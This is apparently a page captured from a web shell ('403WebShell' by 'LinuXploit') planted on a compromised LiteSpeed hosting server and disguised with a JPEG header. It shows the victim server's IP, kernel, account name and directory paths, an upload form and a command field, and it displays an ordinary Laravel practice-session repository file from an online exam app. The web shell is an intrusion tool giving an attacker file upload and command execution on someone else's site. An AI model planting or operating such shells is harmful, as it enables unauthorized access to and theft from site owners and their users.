����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 3.21.126.184
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/cbt.gltechlimited.com/app/Repositories/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/cbt.gltechlimited.com/app/Repositories/UserPracticeSetRepository.php
<?php
/**
 * File name: UserPracticeSetRepository.php
 * Last modified: 17/07/21, 11:58 PM
 * Author: NearCraft - https://codecanyon.net/user/nearcraft
 * Copyright (c) 2021
 */

namespace App\Repositories;

use App\Models\PracticeSession;
use App\Models\PracticeSet;
use Jenssegers\Agent\Agent;

class UserPracticeSetRepository
{
    /**
     * Get existing practice session of a user, if any
     *
     * @param PracticeSet $set
     * @return \Illuminate\Database\Eloquent\Model|\Illuminate\Database\Eloquent\Relations\HasMany|object|null
     */
    public function getSession(PracticeSet $set)
    {
        return $set->sessions()->where('user_id', auth()->user()->id)->latest()->first();
    }

    /**
     * Create a new practice session for an user
     *
     * @param PracticeSet $set
     * @return |null
     */
    public function createSession(PracticeSet $set)
    {
        $session = PracticeSession::create([
            'practice_set_id' => $set->id,
            'user_id' => auth()->user()->id,
            'status' => 'started'
        ]);

        if($session) {
            return $session;
        }

        return null;
    }

    /**
     * Generate user practice session analytics
     *
     * @param $session
     * @param $total
     * @return array
     */
    public function sessionAnalytics($session, $total)
    {
        $questions = collect($session->questions);
        $answered = $questions->where('pivot.status', '=', 'answered')->count();
        $correct = $questions->where('pivot.is_correct', '=', true)->count();
        $wrong = $questions->where('pivot.is_correct', '=', false)->count();
        $answered_time = $questions->where('pivot.status', '=', 'answered')->sum('pivot.time_taken');
        $agent = new Agent();
        return [
            'speed' => round(calculateSpeedPerHour($answered, $session->total_time_taken)),
            'accuracy' => round(calculateAccuracy($correct, $answered), 2),
            'total_questions' => $total,
            'answered_questions' => $answered,
            'unanswered_questions' => $total - $answered,
            'correct_answered_questions' => $correct,
            'wrong_answered_questions' => $wrong,
            'total_time_taken' => formattedSeconds($session->total_time_taken),
            'time_taken_for_answered' => formattedSeconds($answered_time),
            'time_taken_for_other' => formattedSeconds($session->total_time_taken - $answered_time),
            'time_taken_for_correct_answered' => formattedSeconds($questions->where('pivot.is_correct', '=', true)->sum('pivot.time_taken')),
            'time_taken_for_wrong_answered' => formattedSeconds($questions->where('pivot.is_correct', '=', false)->sum('pivot.time_taken')),
            'user_agent' => $agent->getUserAgent(),
            'ip_address' => request()->getClientIp(),
        ];
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit